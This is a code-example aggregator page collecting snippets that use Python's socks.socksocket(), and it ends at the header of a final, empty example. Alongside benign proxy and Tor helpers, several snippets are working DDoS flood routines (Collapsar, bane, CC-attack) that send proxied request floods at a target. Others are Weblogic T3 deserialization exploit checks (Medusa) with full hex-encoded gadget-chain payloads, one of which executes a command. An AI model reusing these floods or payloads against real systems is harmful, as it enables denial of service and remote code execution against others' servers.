Python socks.socksocket() Examples
The following are 30
code examples of socks.socksocket().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
socks
, or try the search function
.
Example #1
Source File: interface.py From encompass with GNU General Public License v3.0 | 6 votes |
def __init__(self, server, config = None): threading.Thread.__init__(self) self.daemon = True self.config = config if config is not None else SimpleConfig() self.lock = threading.Lock() self.is_connected = False self.debug = False # dump network messages. can be changed at runtime using the console self.message_id = 0 self.unanswered_requests = {} # are we waiting for a pong? self.is_ping = False # parse server self.server = server self.host, self.port, self.protocol = self.server.split(':') self.port = int(self.port) self.use_ssl = (self.protocol == 's') self.proxy = self.parse_proxy_options(self.config.get('proxy')) if self.proxy: self.proxy_mode = proxy_modes.index(self.proxy["mode"]) + 1 socks.setdefaultproxy(self.proxy_mode, self.proxy["host"], int(self.proxy["port"])) socket.socket = socks.socksocket # prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy def getaddrinfo(*args): return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))] socket.getaddrinfo = getaddrinfo
Example #2
Source File: collapsar.py From Collapsar with MIT License | 6 votes |
def atk(): #Socks Sent Requests ua = random.choice(useragent) request = "GET " + uu + "?=" + str(random.randint(1,100)) + " HTTP/1.1\r\nHost: " + url + "\r\nUser-Agent: "+ua+"\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n" #Code By GogoZin proxy = random.choice(lsts).strip().split(":") socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1])) time.sleep(5) while True: try: s = socks.socksocket() s.connect((str(url), int(port))) if str(port) =='443': s = ssl.wrap_socket(s) s.send(str.encode(request)) print(Fore.CYAN + "ChallengeCollapsar From ~[" + Fore.WHITE + str(proxy[0])+":"+str(proxy[1])+ Fore.CYAN + "]") #Code By GogoZin try: for y in range(per): s.send(str.encode(request)) print(Fore.CYAN + "ChallengeCollapsar From ~[" + Fore.WHITE + str(proxy[0])+":"+str(proxy[1])+ Fore.CYAN + "]") #Code By GogoZin except: s.close() except: s.close()
Example #3
Source File: pr0cks.py From pr0cks with GNU General Public License v3.0 | 6 votes |
def __init__(self, sock=None, map=None, conn=True, verbose=False): self.out_buffer=b"" self.verbose=verbose self.allsent=False if conn is True: #get the original dst address and port odestdata = sock.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16) _, port, a1, a2, a3, a4 = struct.unpack("!HHBBBBxxxxxxxx", odestdata) address = "%d.%d.%d.%d" % (a1, a2, a3, a4) if self.verbose: display('[+] Forwarding incoming connection from %s to %s through the proxy' % (repr(sock.getpeername()), (address, port))) #connect to the original dst : self.conn_sock = socks.socksocket() #self.conn_sock.settimeout(15) self.conn_sock.connect((address, port)) self.sock_class=Socks5Conn(sock=self.conn_sock, conn=self) #add a dispatcher to handle the other side else: self.sock_class=conn self.conn_sock=None asyncore.dispatcher.__init__(self, sock, map)
Example #4
Source File: socket.py From darklight with Apache License 2.0 | 6 votes |
def ping_check(self, address, port, count=0): """Ping check for check port open.""" with socks.socksocket() as sock: if self.tor_network: sock.setproxy( socks.PROXY_TYPE_SOCKS5, self.ini.read('TOR', 'HOST'), int(self.ini.read('TOR', 'PORT'))) try: sock.connect((address, port)) return True except Exception as e: if count > 10 or '0x05' in e.msg: return False return self.ping_check(address, port, count+1)
Example #5
Source File: speed_test.py From SSRSpeed with GNU General Public License v3.0 | 6 votes |
def __nat_type_test(self): s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM) s.set_proxy(socks.PROXY_TYPE_SOCKS5, LOCAL_ADDRESS, LOCAL_PORT) sport = config["ntt"]["internal_port"] try: logger.info("Performing UDP NAT Type Test") t, eip, eport, sip = pynat.get_ip_info( source_ip=config["ntt"]["internal_ip"], source_port=sport, include_internal=True, sock=s ) return t, eip, eport, sip, sport except: logger.exception("\n") return None, None, None, None, None finally: s.close()
Example #6
Source File: tor_fetcher.py From AIL-framework with GNU Affero General Public License v3.0 | 5 votes |
def create_connection(address, timeout=None, source_address=None): sock = socks.socksocket() sock.connect(address) return sock
Example #7
Source File: sockstest.py From phpsploit with GNU General Public License v3.0 | 5 votes |
def socket_HTTP_IP_test(): s = socks.socksocket() s.set_proxy(socks.HTTP, "127.0.0.1", 8081) s.connect(("133.242.129.236", 80)) s.sendall(raw_HTTP_request()) status = s.recv(2048).splitlines()[0] assert status.startswith(b"HTTP/1.1 200")
Example #8
Source File: GetworkSource.py From poclbm with GNU General Public License v3.0 | 5 votes |
def ensure_connected(self, connection, proto, host): if connection != None and connection.sock != None: return connection, False if proto == 'https': connector = httplib.HTTPSConnection else: connector = httplib.HTTPConnection if not self.options.proxy: return connector(host, strict=True), True host, port = host.split(':') proxy_proto, user, pwd, proxy_host = self.options.proxy[:4] proxy_port = 9050 proxy_host = proxy_host.split(':') if len(proxy_host) > 1: proxy_port = int(proxy_host[1]); proxy_host = proxy_host[0] connection = connector(host, strict=True) connection.sock = socks.socksocket() proxy_type = socks.PROXY_TYPE_SOCKS5 if proxy_proto == 'http': proxy_type = socks.PROXY_TYPE_HTTP elif proxy_proto == 'socks4': proxy_type = socks.PROXY_TYPE_SOCKS4 connection.sock.setproxy(proxy_type, proxy_host, proxy_port, True, user, pwd) try: connection.sock.connect((host, int(port))) except socks.Socks5AuthError: say_exception('Proxy error:') self.stop() return connection, True
Example #9
Source File: network.py From CIRTKit with MIT License | 5 votes |
def download(url, tor=False): def create_connection(address, timeout=None, source_address=None): sock = socks.socksocket() sock.connect(address) return sock if tor: if not HAVE_SOCKS: print_error("Missing dependency, install socks (`pip install SocksiPy`)") return None socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050) socket.socket = socks.socksocket socket.create_connection = create_connection try: req = Request(url) req.add_header('User-agent', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)') res = urlopen(req) data = res.read() except HTTPError as e: print_error(e) except URLError as e: if tor and e.reason.errno == 111: print_error("Connection refused, maybe Tor is not running?") else: print_error(e) except Exception as e: print_error("Failed download: {0}".format(e)) else: return data
Example #10
Source File: socket.py From cyber-security-framework with MIT License | 5 votes |
def __init__(self, family: AddressFamily = AddressFamily.AF_INET, type: SocketKind = SocketKind.SOCK_STREAM, proto: int = 0, fileno: int = None, timeout: int = None, blocking: bool = False, proxy: str = "", rdns: bool = True): super(socks.socksocket, self).__init__(family, type, proto, fileno) if proxy: proxy = urllib.parse.urlparse(proxy, scheme = "socks5") assert proxy.scheme.upper() in socks.PROXY_TYPES, ValueError(f"Invalid proxy type: {repr(proxy.scheme)}.") kwargs = {"addr": proxy.hostname, "rdns": rdns} if proxy.port: kwargs["port"] = proxy.port if proxy.username: kwargs["username"] = proxy.username if proxy.password: kwargs["password"] = proxy.password self.set_proxy(socks.PROXY_TYPES[proxy.scheme.upper()], **kwargs) self.settimeout(timeout) if blocking: self.setblocking(blocking)
Example #11
Source File: ssl_checker.py From ssl-checker with GNU General Public License v3.0 | 5 votes |
def get_cert(self, host, port, user_args): """Connection to the host.""" if user_args.socks: import socks if user_args.verbose: print('{}Socks proxy enabled{}\n'.format(Clr.YELLOW, Clr.RST)) socks_host, socks_port = self.filter_hostname(user_args.socks) socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, socks_host, int(socks_port), True) socket.socket = socks.socksocket if user_args.verbose: print('{}Connecting to socket{}\n'.format(Clr.YELLOW, Clr.RST)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) osobj = SSL.Context(PROTOCOL_TLSv1) sock.connect((host, int(port))) oscon = SSL.Connection(osobj, sock) oscon.set_tlsext_host_name(host.encode()) oscon.set_connect_state() oscon.do_handshake() cert = oscon.get_peer_certificate() sock.close() if user_args.verbose: print('{}Closing socket{}\n'.format(Clr.YELLOW, Clr.RST)) return cert
Example #12
Source File: proxer.py From bane with MIT License | 5 votes |
def proxy_check(ip,p,proto='http',timeout=5): ''' this function is to check if the proxy is dead or not. it takes the following arguments: proto: (set by default to: http) the proxy type: http/https/socks4/socks5 ip: proxy's ip p: proxy's port timeout: (set by default to: 5) the connection's timeout ''' i=False if (proto=='http') or (proto=='https'): try: requests.get("http://www.google.com",proxies={proto:'http://'+ip+':'+p},timeout=timeout) i=True except: pass elif proto=='socks4': try: s =socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS4, ip, p, True) s.settimeout(timeout) s.connect(('www.google.com',80)) i=True except: pass elif proto=='socks5': try: s =socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, ip, p, True) s.settimeout(timeout) s.connect(('www.google.com',80)) i=True except: pass return i
Example #13
Source File: ddos.py From bane with MIT License | 5 votes |
def run(self): x=pointer#thread's ID self.target=target self.port=port self.timeout=_timeout self.tor=tor time.sleep(2) while (stop!=True): try: s =socks.socksocket(socket.AF_INET, socket.SOCK_STREAM) if self.tor==False: s.settimeout(self.timeout) if self.tor==True: s.setproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1' , 9050, True) s.connect((self.target,self.port)) if prints==True: print("[Connected to {}:{}]".format(self.target,self.port)) while (stop!=True): try: s.send("\x00".encode('utf-8'))#send NULL character if prints==True: print("[{}: Voly sent]".format(x)) except Exception as e: break time.sleep(.2) except: pass time.sleep(.3) self.target=None self.port=None self.timeout=None self.tor=None x=None
Example #14
Source File: WeblogicT3DeserializationCommandExecutionVulnerability.py From Medusa with GNU General Public License v3.0 | 5 votes |
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: if proxies!=None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(60) payload='aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b42787057412418757200025b42acf317f8060854e0020000787000000c0daced0005737200176a6176612e7574696c2e4c696e6b656448617368536574d86cd75a95dd2a1e020000787200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f400000000000027372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000698cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01000463616c6308003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313930393035393330363833303701001f4c79736f73657269616c2f50776e657231393039303539333036383330373b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002e000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000037000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e000d000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003b000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078737d00000001001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c61746573787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77080000001000000001740008663561356136303871007e0009787672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787078' server_addr = (url, port) t3handshake(sock, server_addr) buildT3RequestObject(sock) rs ,poc= sendEvilObjData(sock, payload) con= re.findall("org.apache.commons.collections.functors.InvokerTransformer", str(rs), re.S) if len(con)>0: Medusa = "{}存在WeblogicT3反序列化命令执行漏洞(CVE-2016-3510)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n正则数据:{}\r\n".format(url,poc,str(rs),con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
Example #15
Source File: WeblogicWLSCoreComponentsDeserializationCommandExecutionVulnerability.py From Medusa with GNU General Public License v3.0 | 5 votes |
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: if proxies!=None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL=Dnslog() JrmpPort = "2000"#端口随便 JrmpClient = "JRMPClient" YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar" TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10) con,payload=exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient,TempPath) time.sleep(5) if DL.result(): Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url,payload,con,DL.dns_host(),DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
Example #16
Source File: WeblogicDeserializationCommandExecutionVulnerability2.py From Medusa with GNU General Public License v3.0 | 5 votes |
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: if proxies!=None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(60) payload='aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078' server_addr = (url, port) t3handshake(sock, server_addr) buildT3RequestObject(sock) rs ,poc= sendEvilObjData(sock, payload) con= re.findall('\\$Proxy[0-9]+', str(rs), re.S) if len(con)>0: Medusa = "{}存在Weblogic反序列化命令执行漏洞(CVE-2017-3248)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n正则数据:{}\r\n".format(url,poc,str(rs),con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
Example #17
Source File: WeblogicDeserializationCommandExecutionVulnerability.py From Medusa with GNU General Public License v3.0 | 5 votes |
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: if proxies!=None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(60) payload='aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000004001e200000000000000100000572aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a6176612e6c616e672e53747a0000017f72696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e00167571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003740007636d642e6578657400022f6374000463616c63740004657865637571007e001e000000017671007e002f7371007e0011737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f4000000000000078737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003d78' server_addr = (url, port) t3handshake(sock, server_addr) buildT3RequestObject(sock) rs ,poc= sendEvilObjData(sock, payload) con=str(rs) #con= re.findall('weblogic.jms.common.StreamMessageImpl', str(rs), re.S) if con.find("weblogic.jms.common.StreamMessageImpl")!=-1: Medusa = "{}存在Weblogic反序列化命令执行漏洞(CVE-2016-0638)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n".format(url,poc,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
Example #18
Source File: torcrawl.py From TorCrawl.py with GNU General Public License v3.0 | 5 votes |
def connectTor(): try: port = 9050 # Set socks proxy and wrap the urllib module socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', port) socket.socket = socks.socksocket # Perform DNS resolution through the socket def getaddrinfo(*args): return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))] socket.getaddrinfo = getaddrinfo except: e = sys.exc_info()[0] print("Error: %s" % e + "\n## Can't establish connection with TOR")
Example #19
Source File: gsocket.py From Galileo with GNU General Public License v3.0 | 5 votes |
def Send(self,target,data=None,port=80,path=''): # set socks gsock = socks.socksocket() # method if self.method != '':method = self.method.upper() else: method = 'GET' # timeout if self.timeout != None: print(self.timeout) gsock.settimeout(self.timeout) # set proxy if self.proxy != ('' or None or ""): proto,host,port = RProxy(self.proxy) if proto == 3:gsock.set_proxy(socks.HTTP,host,port) elif proto == 2:gsock.set_proxy(socks.SOCKS5,host,port) else:gsock.set_proxy(socks.SOCKS4,host,port) # connect gsock.connect((target,port)) # get if method == 'GET': req = '\r%s /%s %s/%s\r\n'%(method,data if data != None else '', self.protocol.upper(),self.http_version) if self.headers != ('' or None):req += '%s'%(RHeader(self.headers)) # post elif method == 'POST': req = '\r%s /%s %s/%s\r\n'%(method,data if data != None else '', self.protocol.upper(),self.http_version) if self.headers != ('' or None):req += '%s'%(RHeader(self.headers)) if data != ('' or None):req += '\r\n%s\r\n'%(data) # other methods else: req = '\r%s /%s %s/%s\r\n'%(method,data if data != None else '', self.protocol.upper(),self.http_version) if self.headers != ('' or None):req += '%s'%(RHeader(self.headers)) # send data gsock.sendall(req) # return resp resp = gsock.recv(4096) return resp
Example #20
Source File: poc.py From pub with GNU General Public License v2.0 | 5 votes |
def connect(self, host, port, proxy=None, timeout=15): if socks: self.sock = socks.socksocket() else: self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(timeout) if proxy: if not socks: raise Exception("socks support disabled due to unmet dependency. please install pysocks") self.sock.set_proxy(*proxy) return self.sock.connect((host, port))
Example #21
Source File: cc.py From CC-attack with GNU General Public License v2.0 | 5 votes |
def cc(event,socks_type): connection = "Connection: Keep-Alive\r\n" if cookies != "": connection += "Cookies: "+str(cookies)+"\r\n" accept = Choice(acceptall) referer = "Referer: "+Choice(referers)+ ip + url2 + "\r\n" useragent = "User-Agent: " + random.choice(useragents) + "\r\n" proxy = Choice(proxies).strip().split(":") event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(ip), int(port))) if port == 443: ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=ip) try: for _ in range(multiple): get_host = "GET " + url2 + "?" + randomurl() + " HTTP/1.1\r\nHost: " + ip + "\r\n" request = get_host + referer + useragent + accept + connection +"\r\n" s.send(str.encode(request)) except: s.close() print ("[*] CC Flooding from | "+str(proxy[0])+":"+str(proxy[1])) except: s.close()
Example #22
Source File: cc.py From CC-attack with GNU General Public License v2.0 | 5 votes |
def head(event,socks_type):#HEAD MODE connection = "Connection: Keep-Alive\r\n" if cookies != "": connection += "Cookies: "+str(cookies)+"\r\n" accept = Choice(acceptall) referer = "Referer: "+Choice(referers)+ ip + url2 + "\r\n" useragent = "User-Agent: " + random.choice(useragents) + "\r\n" proxy = Choice(proxies).strip().split(":") event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(ip), int(port))) if port == 443: ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=ip) try: for _ in range(multiple): head_host = "HEAD " + url2 + "?" + randomurl() + " HTTP/1.1\r\nHost: " + ip + "\r\n" request = head_host + referer + useragent + accept + connection +"\r\n" s.send(str.encode(request)) except: s.close() print ("[*] CC Flooding from | "+str(proxy[0])+":"+str(proxy[1])) except:#dirty fix s.close()
Example #23
Source File: cc.py From CC-attack with GNU General Public License v2.0 | 5 votes |
